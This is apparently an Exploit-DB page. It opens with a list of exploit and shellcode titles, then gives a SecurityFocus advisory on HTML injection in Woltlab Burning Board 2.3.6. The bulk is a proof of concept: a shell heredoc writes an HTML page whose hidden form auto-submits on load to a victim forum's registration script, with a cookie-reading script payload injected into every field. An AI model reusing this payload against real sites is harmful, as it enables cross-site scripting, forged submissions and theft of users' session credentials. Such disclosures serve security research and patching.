
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
109 lines
No EOL
5.7 KiB
Text
109 lines
No EOL
5.7 KiB
Text
source: https://www.securityfocus.com/bid/22796/info
|
|
|
|
Woltlab Burning Board is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
|
|
|
Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
|
|
|
|
Version 2.3.6 is vulnerable; other versions may also be affected.
|
|
|
|
cat <<EOF > wetpussy.html
|
|
<form name='evilform' method='POST'
|
|
action='http://victimhost/wbb2/register.php'>
|
|
<input type=hidden name=r_username value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_email value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_password value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_confirmpassword value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=key_string value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=key_number value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_homepage value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_icq value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_aim value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_yim value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_msn value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_day value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_month value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_year value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_gender value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_signature value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=disablesmilies value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=disablebbcode value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=disableimages value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_usertext value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=field%5B1%5D value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=field%5B2%5D value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=field%5B3%5D value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_invisible value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_usecookies value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_admincanemail value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_showemail value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_usercanemail value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_emailnotify value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_notificationperpm value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_receivepm value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_emailonpm value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_pmpopup value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_showsignatures value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_showavatars value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_showimages value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_daysprune value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_umaxposts value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_threadview value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_dateformat value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_timeformat value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_startweek value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_timezoneoffset value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_usewysiwyg value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_styleid value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=r_langid value='"><script>alert("Cookie: " +
|
|
document.cookie)</script><lol="'>
|
|
<input type=hidden name=send value='send'>
|
|
<input type=hidden name=sid value=''>
|
|
<input type=hidden name=disclaimer value='viewed'>
|
|
</form>
|
|
<body onload=javascript:document.forms['evilform'].submit();>
|
|
EOF |